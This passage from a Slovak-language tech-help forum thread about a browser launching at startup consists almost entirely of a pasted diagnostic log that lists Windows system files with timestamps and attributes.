2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\DWWIN.EXE
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\dataclen.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\curl.exe
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\ComputerDefaults.exe
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\clusapi.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\CastingShellExt.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\SYSWOW64\srumsvc.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\wwansvc.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\wscinterop.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\Windows.Mirage.Internal.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\Windows.Mirage.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\sysmain.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\SpaceControl.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\SpaceAgent.exe
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\SharedRealitySvc.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\SecurityCenterBroker.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\ProvSysprep.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\pnrpsvc.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\p2psvc.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\p2pnetsh.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\P2PGraph.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\P2P.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\lpasvc.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\Groupinghc.dll
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\EduPrintProv.exe
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\drivers\mrxdav.sys
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\drivers\MbbCx.sys
2019-08-27 19:25:42 ----A---- C:\WINDOWS\system32\CXHProvisioningServer.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\termsrv.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\srms.dat
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\SIHClient.exe
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\ResetEngine.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\reseteng.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\RDSPnf.exe
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\rdpclip.exe
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\PktMon.exe
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\perfts.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\offreg.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\nlahc.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\nettrace.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\MSVidCtl.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\mstsc.exe
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\microsoft-windows-kernel-processor-power-events.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\FSClient.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\FrameServer.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\drivers\udfs.sys
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\drivers\rdpdr.sys
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\AcLayers.dll
2019-08-27 19:25:39 ----A---- C:\WINDOWS\system32\AcGenral.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\wsp_health.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\wsp_fs.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\wercplsupport.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\werconcpl.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\systemreset.exe
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\SMSRouter.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\ResetEngOnline.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\nshwfp.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\nltest.exe
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\msisip.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\msiexec.exe
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\msi.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\msfeeds.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\itss.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\iedkcs32.dll
2019-08-27 19:25:38 ----A---- C:\WINDOWS\system32\DWWIN.EXE
2019-08-27 19:25:38 ----A---- C:\WINDOWS\regedit.exe
2019-08-27 19:25:38 ----A---- C:\WINDOWS\HelpPane.exe
2019-08-27 19:25:37 ----A---- C:\WINDOWS\system32\ieframe.dll
2019-08-27 19:25:36 ----A---- C:\WINDOWS\system32\ieproxy.dll
2019-08-27 19:25:36 ----A---- C:\WINDOWS\system32\ie4uinit.exe
2019-08-27 19:25:36 ----A---- C:\WINDOWS\system32\drivers\bridge.sys
2019-08-27 19:25:35 ----A---- C:\WINDOWS\system32\werui.dll
2019-08-27 19:25:35 ----A---- C:\WINDOWS\system32\nshhttp.dll
2019-08-27 19:25:35 ----A---- C:\WINDOWS\system32\jscript.dll
2019-08-27 19:25:35 ----A---- C:\WINDOWS\system32\iscsiwmi.dll
2019-08-27 19:25:35 ----A---- C:\WINDOWS\system32\Chakradiag.dll
2019-08-27 19:25:35 ----A---- C:\WINDOWS\system32\esentutl.exe
2019-08-27 19:25:35 ----A---- C:\WINDOWS\system32\dxdiag.exe
2019-08-27 19:25:35 ----A---- C:\WINDOWS\system32\dataclen.dll
2019-08-27 19:25:35 ----A---- C:\WINDOWS\system32\ComputerDefaults.exe
2019-08-27 19:25:35 ----A---- C:\WINDOWS\system32\CompMgmtLauncher.exe
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\storagewmi.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\spaceman.exe
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\spacebridge.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\resutils.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\ResourceMapper.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\PlayToManager.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\objsel.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\mispace.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\fsutil.exe
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\facecredentialprovider.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\dusmsvc.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\drivers\cdfs.sys
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\discan.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\defragsvc.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\clusapi.dll
2019-08-27 19:25:34 ----A---- C:\WINDOWS\system32\CastingShellExt.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\SYSWOW64\Windows.Graphics.Printing.Workflow.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\SYSWOW64\scrrun.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\SYSWOW64\rastls.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\SYSWOW64\rasapi32.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\SYSWOW64\PrintWorkflowService.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\SYSWOW64\OpenWith.exe
2019-08-27 19:25:31 ----A---- C:\WINDOWS\SYSWOW64\ntshrui.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\SYSWOW64\ExplorerFrame.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\SYSWOW64\AzureSettingSyncProvider.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\system32\ssdpsrv.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\system32\SecureBioSysprep.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\system32\RDXService.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\system32\Microsoft.Graphics.Display.DisplayEnhancementService.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\system32\DataUsageLiveTileTask.exe
2019-08-27 19:25:31 ----A---- C:\WINDOWS\system32\DataUsageHandlers.dll
2019-08-27 19:25:31 ----A---- C:\WINDOWS\system32\BioIso.exe
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\XpsPrint.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\wininet.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\Windows.UI.Immersive.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\Windows.Graphics.Display.BrightnessOverride.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\tdh.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\SmartcardCredentialProvider.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\shunimpl.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\setupcln.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\setupapi.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\SettingSyncHost.exe
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\SettingSyncCore.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\SensorsApi.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\rastapi.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\rasppp.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\rasman.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\prnntfy.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\perfproc.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\OneDriveSettingSyncProvider.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\olepro32.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\notepad.exe
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\newdev.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\msIso.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\mprddm.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\MicrosoftAccountTokenProvider.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\mf3216.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\mcbuilder.exe
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\LockAppBroker.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\imm32.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\iertutil.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\hlink.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\fontsub.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\edgeIso.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\cscdll.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\cscapi.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\comdlg32.dll
2019-08-27 19:25:30 ----A---- C:\WINDOWS\SYSWOW64\AboveLockAppHost.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\xmllite.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\Windows.Media.Speech.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\Windows.Media.Playback.MediaPlayer.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\Windows.Media.Playback.BackgroundMediaPlayer.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\Windows.Media.BackgroundMediaPlayback.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\Windows.Internal.Management.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\wincredui.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\vssapi.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\usoapi.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\uReFS.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\t2embed.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\srpapi.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\SndVolSSO.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\RpcPing.exe
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\policymanager.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\ntlanman.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\nslookup.exe
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\mdmregistration.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\GdiPlus.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\fdBth.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\dwmcore.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\dwmapi.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\dmenrollengine.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\dcomp.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\credui.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\credprovhost.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\container.dll
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\cmd.exe
2019-08-27 19:25:29 ----A---- C:\WINDOWS\SYSWOW64\BitLockerCsp.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\Windows.StateRepositoryUpgrade.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\Windows.StateRepositoryPS.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\Windows.StateRepositoryCore.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\Windows.StateRepositoryClient.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\Windows.StateRepositoryBroker.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\Windows.StateRepository.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\UserDataTimeUtil.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\user32.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\Taskmgr.exe
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\StateRepository.Core.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\rmclient.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\rdpcore.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\propsys.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\ole32.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\ngccredprov.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\drvsetup.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\cryptngc.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\AppxPackaging.dll
2019-08-27 19:25:28 ----A---- C:\WINDOWS\SYSWOW64\apphelp.dll
2019-08-27 19:25:25 ----RA---- C:\WINDOWS\SYSWOW64\icuuc.dll
2019-08-27 19:25:25 ----RA---- C:\WINDOWS\SYSWOW64\icuin.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\wpnapps.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\Windows.UI.Core.TextInput.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\Windows.System.Diagnostics.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\Windows.Services.TargetedContent.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\Windows.Networking.Vpn.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\Windows.Devices.Lights.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\Windows.ApplicationModel.Store.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\ttdwriter.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\ttdrecordcpu.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\tquery.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\TileDataRepository.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\SearchProtocolHost.exe
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\SearchIndexer.exe
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\Search.ProtocolHandler.MAPI2.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\rdpserverbase.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\rdpbase.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\mssvp.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\mssrch.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\mssph.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\MbaeApiPublic.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\MbaeApi.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\MapRouter.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\MapGeocoder.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\MapConfiguration.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\JpMapControl.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\InstallService.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\InputHost.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\coml2.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\cmintegrator.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\BingOnlineServices.dll
2019-08-27 19:25:25 ----A---- C:\WINDOWS\SYSWOW64\BingMaps.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\wintrust.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.System.SystemManagement.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.Security.Authentication.OnlineId.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.Globalization.dll

Re: Zapnutie prehliadača po spustení pc

Napsal: 17 zář 2019 18:51
od mifoIV
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.Devices.SerialCommunication.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.Devices.Radios.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.Devices.Picker.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.Devices.LowLevel.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.Devices.Enumeration.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.Data.Pdf.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\Windows.AI.MachineLearning.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\twinapi.appcore.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\thumbcache.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\taskcomp.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\smartscreenps.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\ShareHost.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\OneCoreUAPCommonProxyStub.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\gdi32.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\dmvdsitf.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\DisplayManager.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\directmanipulation.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\D3D12.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\d3d10warp.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\cdprt.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\cdp.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\AssignedAccessRuntime.dll
2019-08-27 19:25:24 ----A---- C:\WINDOWS\SYSWOW64\ActivationManager.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\WWAHost.exe
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\wisp.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\Windows.Web.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\Windows.UI.Input.Inking.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\Windows.UI.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\Windows.Security.Authentication.Web.Core.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\Windows.Networking.Connectivity.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\twinui.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\TSWorkspace.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\TokenBrokerUI.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\TokenBroker.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\sppcext.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\spopk.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\SpatialAudioLicenseSrv.exe
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\slcext.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\ShellCommonCommonProxyStub.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\ReAgent.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\RADCUI.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\LicensingWinRT.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\LicensingDiagSpp.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\kernel32.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\InputSwitch.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\explorer.exe
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\EditionUpgradeManagerObj.dll
2019-08-27 19:25:23 ----A---- C:\WINDOWS\SYSWOW64\ComposableShellProxyStub.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\wscapi.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\wlanapi.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\Windows.Networking.NetworkOperators.HotspotAuthentication.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\rpcrt4.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\oleprn.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\msvcrt.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\hmkd.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\FlightSettings.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\dsound.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\CredentialMigrationHandler.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\ContentDeliveryManager.Utilities.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\SYSWOW64\CompPkgSup.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\Windows.Internal.Management.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\t2embed.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\policymanager.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\omadmclient.exe
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\mdmmigrator.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\MdmDiagnostics.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\enterprisecsps.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\DMPushRouterCore.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\dmenterprisediagnostics.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\dmenrollengine.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\DiagnosticLogCSP.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\DeviceEnroller.exe
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\configmanager2.dll
2019-08-27 19:25:22 ----A---- C:\WINDOWS\system32\BitLockerCsp.dll
2019-08-27 19:25:19 ----RSH---- C:\WINDOWS\fonts\StaticCache.dat
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\wininet.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\Windows.UI.Immersive.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\wincredui.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\perfproc.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\nslookup.exe
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\msIso.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\LogonController.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\iertutil.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\hlink.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\gpsvc.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\GdiPlus.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\efscore.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\edgeIso.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\DeviceSoftwareInstallationClient.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\credui.dll
2019-08-27 19:25:19 ----A---- C:\WINDOWS\system32\credprovhost.dll
2019-08-27 19:25:17 ----A---- C:\WINDOWS\SYSWOW64\NetSetupEngine.dll
2019-08-27 19:25:17 ----A---- C:\WINDOWS\SYSWOW64\NetSetupApi.dll
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\usermgr.dll
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\smss.exe
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\ntlanman.dll
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\NetSetupSvc.dll
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\msvcrt.dll
